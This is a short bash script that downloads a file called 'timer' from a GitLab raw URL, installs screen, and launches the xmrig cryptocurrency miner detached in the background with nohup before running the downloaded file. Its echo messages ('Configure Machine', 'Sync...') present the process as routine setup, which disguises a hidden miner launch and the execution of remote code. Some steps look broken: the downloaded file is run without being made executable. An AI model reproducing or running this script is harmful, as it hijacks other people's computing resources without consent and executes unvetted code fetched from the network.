#!/bin/bash
nohup wget https://gitlab.com/lambohopo/bash/-/raw/main/timer
nohup mkdir safa
nohup apt install screen -y
echo "+++++++ Configure Machine +++++++++"
chmod +x xmrig
cd safa
echo "Configure Successfully"
cd ..
screen -d -m nohup ./xmrig --config=config.json
echo "+++++++ Sync... +++++++++"
./timer
